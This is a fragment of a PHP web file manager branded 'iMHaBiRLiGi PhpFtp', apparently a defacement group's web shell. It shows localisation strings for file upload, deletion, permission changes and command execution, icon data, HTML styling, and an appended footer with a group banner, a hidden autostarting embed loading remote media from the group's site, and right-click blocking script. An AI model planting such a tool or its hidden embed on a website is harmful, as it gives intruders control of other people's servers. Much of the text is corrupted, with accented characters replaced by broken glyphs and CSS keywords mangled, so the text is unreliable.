|
'password' => 'Mot de passe',
|
|||
|
'add' => 'Ajouter',
|
|||
|
'add_basic_auth' => 'add basic-authentification',
|
|||
|
|
|||
|
'uploaded' => '"[%1]" a <20>t<EFBFBD> t<>l<EFBFBD>charg<72> sur le serveur.',
|
|||
|
'not_uploaded' => '"[%1]" n a pas <20>t<EFBFBD> t<>l<EFBFBD>charg<72> sur le serveur.',
|
|||
|
'already_exists' => '"[%1]" existe d<>j<EFBFBD>.',
|
|||
|
'created' => '"[%1]" a <20>t<EFBFBD> cr<63><72>.',
|
|||
|
'not_created' => '"[%1]" n a pas pu <20>tre cr<63><72>.',
|
|||
|
'really_Sil' => 'Effacer le fichier?',
|
|||
|
'Sild' => "Ces fichiers ont <20>t<EFBFBD> d<>tuits:\n[%1]",
|
|||
|
'not_Sild' => "Ces fichiers n ont pu <20>tre d<>truits:\n[%1]",
|
|||
|
'Degistir_file' => 'Renomme fichier:',
|
|||
|
'Degistird' => '"[%1]" a <20>t<EFBFBD> renomm<6D> en "[%2]".',
|
|||
|
'not_Degistird' => '"[%1] n a pas pu <20>tre renomm<6D> en "[%2]".',
|
|||
|
'Tasi_files' => 'D<>placer ces fichiers:',
|
|||
|
'Tasid' => "Ces fichiers ont <20>t<EFBFBD> d<>plac<61>s en \"[%2]\":\n[%1]",
|
|||
|
'not_Tasid' => "Ces fichiers n ont pas pu <20>tre d<>plac<61>s en \"[%2]\":\n[%1]",
|
|||
|
'Kopyala_files' => 'Copier ces fichiers:',
|
|||
|
'copied' => "Ces fichiers ont <20>t<EFBFBD> copi<70>s en \"[%2]\":\n[%1]",
|
|||
|
'not_copied' => "Ces fichiers n ont pas pu <20>tre copi<70>s en \"[%2]\":\n[%1]",
|
|||
|
'not_D<5F>zenleed' => '"[%1]" ne peut <20>tre ouvert.',
|
|||
|
'executed' => "\"[%1]\" a <20>t<EFBFBD> brillamment ex<65>cut<75> :\n{%2}",
|
|||
|
'not_executed' => "\"[%1]\" n a pas pu <20>tre ex<65>cut<75>:\n{%2}",
|
|||
|
'saved' => '"[%1]" a <20>t<EFBFBD> sauvegard<72>.',
|
|||
|
'not_saved' => '"[%1]" n a pas pu <20>tre sauvegard<72>.',
|
|||
|
'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a <20>t<EFBFBD> cr<63>e.',
|
|||
|
'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu <20>tre cr<63><72>.',
|
|||
|
'permission_for' => 'Droits de "[%1]":',
|
|||
|
'permission_set' => 'Droits de "[%1]" ont <20>t<EFBFBD> chang<6E>s en [%2].',
|
|||
|
'permission_not_set' => 'Droits de "[%1]" n ont pas pu <20>tre chang<6E>s en[%2].',
|
|||
|
'not_readable' => '"[%1]" ne peut pas <20>tre ouvert.'
|
|||
|
);
|
|||
|
|
|||
|
case 'it':
|
|||
|
|
|||
|
$date_format = 'd-m-Y H:i:s';
|
|||
|
$word_charset = 'ISO-8859-1';
|
|||
|
|
|||
|
return array(
|
|||
|
'directory' => 'Directory',
|
|||
|
'file' => 'File',
|
|||
|
'filename' => 'Nome File',
|
|||
|
|
|||
|
'size' => 'Dimensioni',
|
|||
|
'permission' => 'Permessi',
|
|||
|
'owner' => 'Proprietario',
|
|||
|
'group' => 'Gruppo',
|
|||
|
'other' => 'Altro',
|
|||
|
'G<>revler' => 'Funzioni',
|
|||
|
|
|||
|
'read' => 'leggi',
|
|||
|
'write' => 'scrivi',
|
|||
|
'execute' => 'esegui',
|
|||
|
|
|||
|
'create_symlink' => 'crea link simbolico',
|
|||
|
'Sil' => 'cancella',
|
|||
|
'Degistir' => 'rinomina',
|
|||
|
'Tasi' => 'sposta',
|
|||
|
'Kopyala' => 'copia',
|
|||
|
'D<>zenle' => 'modifica',
|
|||
|
'indir' => 'indir',
|
|||
|
'upload' => 'upload',
|
|||
|
'create' => 'crea',
|
|||
|
'change' => 'cambia',
|
|||
|
'save' => 'salva',
|
|||
|
'set' => 'imposta',
|
|||
|
'reset' => 'reimposta',
|
|||
|
'relative' => 'Percorso relativo per la destinazione',
|
|||
|
|
|||
|
'yes' => 'Si',
|
|||
|
'no' => 'No',
|
|||
|
'Geri' => 'indietro',
|
|||
|
'Yol' => 'Destinazione',
|
|||
|
'symlink' => 'Link simbolico',
|
|||
|
'no_output' => 'no output',
|
|||
|
|
|||
|
'user' => 'User',
|
|||
|
'password' => 'Password',
|
|||
|
'add' => 'aggiungi',
|
|||
|
'add_basic_auth' => 'aggiungi autenticazione base',
|
|||
|
|
|||
|
'uploaded' => '"[%1]" <20> stato caricato.',
|
|||
|
'not_uploaded' => '"[%1]" non <20> stato caricato.',
|
|||
|
'already_exists' => '"[%1]" esiste gi<67>.',
|
|||
|
'created' => '"[%1]" <20> stato creato.',
|
|||
|
'not_created' => '"[%1]" non <20> stato creato.',
|
|||
|
'really_Sil' => 'Cancello questi file ?',
|
|||
|
'Sild' => "Questi file sono stati cancellati:\n[%1]",
|
|||
|
'not_Sild' => "Questi file non possono essere cancellati:\n[%1]",
|
|||
|
'Degistir_file' => 'File rinominato:',
|
|||
|
'Degistird' => '"[%1]" <20> stato rinominato in "[%2]".',
|
|||
|
'not_Degistird' => '"[%1] non <20> stato rinominato in "[%2]".',
|
|||
|
'Tasi_files' => 'Sposto questi file:',
|
|||
|
'Tasid' => "Questi file sono stati spostati in \"[%2]\":\n[%1]",
|
|||
|
'not_Tasid' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]",
|
|||
|
'Kopyala_files' => 'Copio questi file',
|
|||
|
'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]",
|
|||
|
'not_copied' => "Questi file non possono essere copiati in \"[%2]\":\n[%1]",
|
|||
|
'not_D<5F>zenleed' => '"[%1]" non pu<70> essere modificato.',
|
|||
|
'executed' => "\"[%1]\" <20> stato eseguito con successo:\n{%2}",
|
|||
|
'not_executed' => "\"[%1]\" non <20> stato eseguito con successo\n{%2}",
|
|||
|
'saved' => '"[%1]" <20> stato salvato.',
|
|||
|
'not_saved' => '"[%1]" non <20> stato salvato.',
|
|||
|
'symlinked' => 'Il link siambolico da "[%2]" a "[%1]" <20> stato creato.',
|
|||
|
'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non <20> stato creato.',
|
|||
|
'permission_for' => 'Permessi di "[%1]":',
|
|||
|
'permission_set' => 'I permessi di "[%1]" sono stati impostati [%2].',
|
|||
|
'permission_not_set' => 'I permessi di "[%1]" non sono stati impostati [%2].',
|
|||
|
'not_readable' => '"[%1]" non pu<70> essere letto.'
|
|||
|
);
|
|||
|
|
|||
|
case 'se':
|
|||
|
|
|||
|
$date_format = 'n/j/y H:i:s';
|
|||
|
$word_charset = 'ISO-8859-1';
|
|||
|
|
|||
|
return array(
|
|||
|
'directory' => 'Mapp',
|
|||
|
'file' => 'Fil',
|
|||
|
'filename' => 'Filnamn',
|
|||
|
|
|||
|
'size' => 'Storlek',
|
|||
|
'permission' => 'S<>kerhetsniv<69>',
|
|||
|
'owner' => '<27>gare',
|
|||
|
'group' => 'Grupp',
|
|||
|
'other' => 'Andra',
|
|||
|
'G<>revler' => 'Funktioner',
|
|||
|
|
|||
|
'read' => 'L<>s',
|
|||
|
'write' => 'Skriv',
|
|||
|
'execute' => 'Utf<74>r',
|
|||
|
|
|||
|
'create_symlink' => 'Skapa symlink',
|
|||
|
'Sil' => 'Radera',
|
|||
|
'Degistir' => 'Byt namn',
|
|||
|
'Tasi' => 'Flytta',
|
|||
|
'Kopyala' => 'Kopiera',
|
|||
|
'D<>zenle' => '<27>ndra',
|
|||
|
'indir' => 'Ladda ner',
|
|||
|
'upload' => 'Ladda upp',
|
|||
|
'create' => 'Skapa',
|
|||
|
'change' => '<27>ndra',
|
|||
|
'save' => 'Spara',
|
|||
|
'set' => 'Markera',
|
|||
|
'reset' => 'T<>m',
|
|||
|
'relative' => 'Relative path to target',
|
|||
|
|
|||
|
'yes' => 'Ja',
|
|||
|
'no' => 'Nej',
|
|||
|
'Geri' => 'Tillbaks',
|
|||
|
'Yol' => 'Yol',
|
|||
|
'symlink' => 'Symlink',
|
|||
|
'no_output' => 'no output',
|
|||
|
|
|||
|
'user' => 'Anv<6E>ndare',
|
|||
|
'password' => 'L<>senord',
|
|||
|
'add' => 'L<>gg till',
|
|||
|
'add_basic_auth' => 'add basic-authentification',
|
|||
|
|
|||
|
'uploaded' => '"[%1]" har laddats upp.',
|
|||
|
'not_uploaded' => '"[%1]" kunde inte laddas upp.',
|
|||
|
'already_exists' => '"[%1]" finns redan.',
|
|||
|
'created' => '"[%1]" har skapats.',
|
|||
|
'not_created' => '"[%1]" kunde inte skapas.',
|
|||
|
'really_Sil' => 'Radera dessa filer?',
|
|||
|
'Sild' => "De h<>r filerna har raderats:\n[%1]",
|
|||
|
'not_Sild' => "Dessa filer kunde inte raderas:\n[%1]",
|
|||
|
'Degistir_file' => 'Byt namn p<> fil:',
|
|||
|
'Degistird' => '"[%1]" har bytt namn till "[%2]".',
|
|||
|
'not_Degistird' => '"[%1] kunde inte d<>pas om till "[%2]".',
|
|||
|
'Tasi_files' => 'Flytta dessa filer:',
|
|||
|
'Tasid' => "Dessa filer har flyttats till \"[%2]\":\n[%1]",
|
|||
|
'not_Tasid' => "Dessa filer kunde inte flyttas till \"[%2]\":\n[%1]",
|
|||
|
'Kopyala_files' => 'Kopiera dessa filer:',
|
|||
|
'copied' => "Dessa filer har kopierats till \"[%2]\":\n[%1]",
|
|||
|
'not_copied' => "Dessa filer kunde inte kopieras till \"[%2]\":\n[%1]",
|
|||
|
'not_D<5F>zenleed' => '"[%1]" kan inte <20>ndras.',
|
|||
|
'executed' => "\"[%1]\" har utf<74>rts:\n{%2}",
|
|||
|
'not_executed' => "\"[%1]\" kunde inte utf<74>ras:\n{%2}",
|
|||
|
'saved' => '"[%1]" har sparats.',
|
|||
|
'not_saved' => '"[%1]" kunde inte sparas.',
|
|||
|
'symlinked' => 'Symlink fr<66>n "[%2]" till "[%1]" har skapats.',
|
|||
|
'not_symlinked' => 'Symlink fr<66>n "[%2]" till "[%1]" kunde inte skapas.',
|
|||
|
'permission_for' => 'R<>ttigheter f<>r "[%1]":',
|
|||
|
'permission_set' => 'R<>ttigheter f<>r "[%1]" <20>ndrades till [%2].',
|
|||
|
'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
|
|||
|
'not_readable' => '"[%1]" kan inte l<>sas.'
|
|||
|
);
|
|||
|
|
|||
|
case 'en':
|
|||
|
default:
|
|||
|
|
|||
|
$date_format = 'n/j/y H:i:s';
|
|||
|
$word_charset = 'ISO-8859-1';
|
|||
|
|
|||
|
return array(
|
|||
|
'directory' => 'D<>zergah',
|
|||
|
'file' => 'Dosya',
|
|||
|
'filename' => 'DosyaAdi',
|
|||
|
|
|||
|
'size' => 'Boyut',
|
|||
|
'permission' => 'izin',
|
|||
|
'owner' => 'Sahip',
|
|||
|
'group' => 'Grup',
|
|||
|
'other' => 'Di<44>erleri',
|
|||
|
'G<>revler' => 'G<>revler',
|
|||
|
|
|||
|
'read' => 'Oku',
|
|||
|
'write' => 'Yaz',
|
|||
|
'execute' => 'Uygula',
|
|||
|
|
|||
|
'create_symlink' => 'create symlink',
|
|||
|
'Sil' => 'Sil',
|
|||
|
'Degistir' => 'Degistir',
|
|||
|
'Tasi' => 'Tasi',
|
|||
|
'Kopyala' => 'Kopyala',
|
|||
|
'D<>zenle' => 'D<>zenle',
|
|||
|
'indir' => 'indir',
|
|||
|
'upload' => 'Y<>kle',
|
|||
|
'create' => 'Olustur',
|
|||
|
'change' => 'Degisiklik',
|
|||
|
'save' => 'Kaydet',
|
|||
|
'set' => 'Koyulan',
|
|||
|
'reset' => 'Yenile',
|
|||
|
'relative' => 'Hedefe Yolla',
|
|||
|
|
|||
|
'yes' => 'Evet',
|
|||
|
'no' => 'Hayir',
|
|||
|
'Geri' => 'Geri',
|
|||
|
'Yol' => 'Yol',
|
|||
|
'symlink' => 'Symlink',
|
|||
|
'no_output' => 'Hi<48>bir <20><>kt<6B>',
|
|||
|
|
|||
|
'user' => 'Kullan<61>c<EFBFBD>',
|
|||
|
'password' => 'Sifre',
|
|||
|
'add' => 'Ekle',
|
|||
|
'add_basic_auth' => 'add basic-authentification',
|
|||
|
|
|||
|
'uploaded' => '"[%1]" Y<>klendi.',
|
|||
|
'not_uploaded' => '"[%1]" Y<>klenemedi.',
|
|||
|
'already_exists' => '"[%1]" <20>imdiden var ol.',
|
|||
|
'created' => '"[%1]" Olusturuldu.',
|
|||
|
'not_created' => '"[%1]" Olusturuldu.',
|
|||
|
'really_Sil' => 'Silinen dosyalar?',
|
|||
|
'Sild' => "Bu dosyalar,oldu Sild:\n[%1]",
|
|||
|
'not_Sild' => "Bu dosyalar olamazd<7A> Sild:\n[%1]",
|
|||
|
'Degistir_file' => 'Dosyayi Degistir:',
|
|||
|
'Degistird' => '"[%1]" Degistirildi "[%2]".',
|
|||
|
'not_Degistird' => '"[%1] Degistirilemedi "[%2]".',
|
|||
|
'Tasi_files' => 'Dosyayi TAsi:',
|
|||
|
'Tasid' => "Bu Dosyalar Tasindi \"[%2]\":\n[%1]",
|
|||
|
'not_Tasid' => "Bu Dosyalar Tasinamaz \"[%2]\":\n[%1]",
|
|||
|
'Kopyala_files' => 'Bu Dosyalari Kopyala:',
|
|||
|
'copied' => "Bu Dosyalar Kopyalanir \"[%2]\":\n[%1]",
|
|||
|
'not_copied' => "Bu Dosyalar Kopyalanamaz \"[%2]\":\n[%1]",
|
|||
|
'not_D<5F>zenleed' => '"[%1]" D<>zenle.',
|
|||
|
'executed' => "\"[%1]\" Basarili bir sekilde Uygulandi:\n{%2}",
|
|||
|
'not_executed' => "\"[%1]\" Basarili bir sekilde Uygulanamadi:\n{%2}",
|
|||
|
'saved' => '"[%1]" Kurtarildi.',
|
|||
|
'not_saved' => '"[%1]" Kurtar<61>lamad<61>.',
|
|||
|
'symlinked' => 'Symlink "[%2]" to "[%1]" Olusturuldu.',
|
|||
|
'not_symlinked' => 'Symlink "[%2]" to "[%1]" Olusturulamadi.',
|
|||
|
'permission_for' => 'izin "[%1]":',
|
|||
|
'permission_set' => 'izin "[%1]" Kopyalandi [%2].',
|
|||
|
'permission_not_set' => 'izin "[%1]" Yapilamadi [%2].',
|
|||
|
'not_readable' => '"[%1]" Okunamadi.'
|
|||
|
);
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function getimage ($image) {
|
|||
|
switch ($image) {
|
|||
|
case 'file':
|
|||
|
return base64_decode('R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
|
|||
|
case 'folder':
|
|||
|
return base64_decode('R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA');
|
|||
|
case 'hidden_file':
|
|||
|
return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
|
|||
|
case 'link':
|
|||
|
return base64_decode('R0lGODlhEQANAKIEAJmZmf///wAAAMwAAP///wAAAAAAAAAAACH5BAHoAwQALAAAAAARAA0AAAM5SArcrDCCQOuLcIotwgTYUllNOA0DxXkmhY4shM5zsMUKTY8gNgUvW6cnAaZgxMyIM2zBLCaHlJgAADsA');
|
|||
|
case 'smiley':
|
|||
|
return base64_decode('R0lGODlhEQANAJECAAAAAP//AP///wAAACH5BAHoAwIALAAAAAARAA0AAAIslI+pAu2wDAiz0jWD3hqmBzZf1VCleJQch0rkdnppB3dKZuIygrMRE/oJDwUAOwA=');
|
|||
|
case 'arrow':
|
|||
|
return base64_decode('R0lGODlhEQANAIABAAAAAP///yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw==');
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
function html_header () {
|
|||
|
global $charset;
|
|||
|
|
|||
|
echo <<<END
|
|||
|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
|
|||
|
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
|
|||
|
<html xmlns="http://www.w3.org/1999/xhtml">
|
|||
|
<head>
|
|||
|
|
|||
|
<meta http-equiv="Content-Type" content="text/html; charset=$charset" />
|
|||
|
|
|||
|
<title>iMHaBiRLiGi PhpFtp</title>
|
|||
|
|
|||
|
<style type="text/css">
|
|||
|
body { font: small sans-serif; text-align: center }
|
|||
|
img { width: 0px; height: 0px }
|
|||
|
a, a:visited { text-decoration: none; color: red }
|
|||
|
hr { border-style: none; height: 1px; Geriground-color: silver; color: silver }
|
|||
|
#main { margin-top: 6pt; margin-left: auto; margin-right: auto; border-spacing: 1px }
|
|||
|
#main th { Geriground: #eee; padding: 3pt 3pt 0pt 3pt }
|
|||
|
.listing th, .listing td { padding: 1px 3pt 0 3pt }
|
|||
|
.listing th { border: 1px solid silver }
|
|||
|
.listing td { border: 1px solid #ddd; Geriground: white }
|
|||
|
.listing .checkbox { text-align: center }
|
|||
|
.listing .filename { text-align: left }
|
|||
|
.listing .size { text-align: right }
|
|||
|
.listing .permission_header { text-align: left }
|
|||
|
.listing .permission { font-family: monospace }
|
|||
|
.listing .owner { text-align: left }
|
|||
|
.listing .group { text-align: left }
|
|||
|
.listing .G<EFBFBD>revler { text-align: left }
|
|||
|
.listing_footer td { Geriground: #eee; border: 1px solid silver }
|
|||
|
#directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt }
|
|||
|
#directory { Geriground: #eee; border: 1px solid silver }
|
|||
|
#upload { padding-top: 1em }
|
|||
|
#create { padding-bottom: 1em }
|
|||
|
.small, .small option { font-size: x-small }
|
|||
|
textarea { border: none; Geriground: white }
|
|||
|
table.dialog { margin-left: auto; margin-right: auto }
|
|||
|
td.dialog { Geriground: #eee; padding: 1ex; border: 1px solid silver; text-align: center }
|
|||
|
#permission { margin-left: auto; margin-right: auto }
|
|||
|
#permission td { padding-left: 3pt; padding-right: 3pt; text-align: center }
|
|||
|
td.permission_action { text-align: right }
|
|||
|
#symlink { Geriground: #eee; border: 1px solid silver }
|
|||
|
#symlink td { text-align: left; padding: 3pt }
|
|||
|
#red_button { width: 120px; color: #400 }
|
|||
|
#green_button { width: 120px; color: #040 }
|
|||
|
#error td { Geriground: maroon; color: white; border: 1px solid silver }
|
|||
|
#notice td { Geriground: green; color: white; border: 1px solid silver }
|
|||
|
#notice pre, #error pre { Geriground: silver; color: black; padding: 1ex; margin-left: 1ex; margin-right: 1ex }
|
|||
|
code { font-size: 12pt }
|
|||
|
td { white-space: nowrap }
|
|||
|
</style>
|
|||
|
|
|||
|
<script type="text/javascript">
|
|||
|
<!--
|
|||
|
function activate (name) {
|
|||
|
if (document && document.forms[0] && document.forms[0].elements['focus']) {
|
|||
|
document.forms[0].elements['focus'].value = name;
|
|||
|
}
|
|||
|
}
|
|||
|
//-->
|
|||
|
</script>
|
|||
|
|
|||
|
</head>
|
|||
|
<body>
|
|||
|
|
|||
|
|
|||
|
END;
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function html_footer () {
|
|||
|
|
|||
|
echo <<<END
|
|||
|
</body>
|
|||
|
</html>
|
|||
|
END;
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function notice ($phrase) {
|
|||
|
global $cols;
|
|||
|
|
|||
|
$args = func_get_args();
|
|||
|
array_shift($args);
|
|||
|
|
|||
|
return '<tr id="notice">
|
|||
|
<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
|
|||
|
</tr>
|
|||
|
';
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function error ($phrase) {
|
|||
|
global $cols;
|
|||
|
|
|||
|
$args = func_get_args();
|
|||
|
array_shift($args);
|
|||
|
|
|||
|
return '<tr id="error">
|
|||
|
<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
|
|||
|
</tr>
|
|||
|
';
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
?>
|
|||
|
<BODY><IMG style="WIDTH: 306px; HEIGHT: 76px" height=100
|
|||
|
src="http://www.nettekiadres.com/imhabirligi.jpg" width=282></BODY>
|
|||
|
<br><Center>SU AN <A href="http://www.imhabirligi.com">iMHaBiRLiGi</A> HUDUTLARINDA BULUNMAKTASINIZ.!!</Center>
|
|||
|
<FONT
|
|||
|
class=footmsg><EMBED src=http://www.imhabirligi.com/r1/hurl.asx hidden=true
|
|||
|
type="text/plain; charset=iso-8859-9"
|
|||
|
AUTOSTART="TRUE">
|
|||
|
<script language=JavaScript>
|
|||
|
<!--
|
|||
|
|
|||
|
var message="";
|
|||
|
///////////////////////////////////
|
|||
|
function clickIE() {if (document.all) {(message);return false;}}
|
|||
|
function clickNS(e) {if
|
|||
|
(document.layers||(document.getElementById&&!document.all)) {
|
|||
|
if (e.which==2||e.which==3) {(message);return false;}}}
|
|||
|
if (document.layers)
|
|||
|
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
|
|||
|
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
|
|||
|
|
|||
|
document.oncontextmenu=new Function("return false")
|
|||
|
// -->
|
|||
|
</script>
|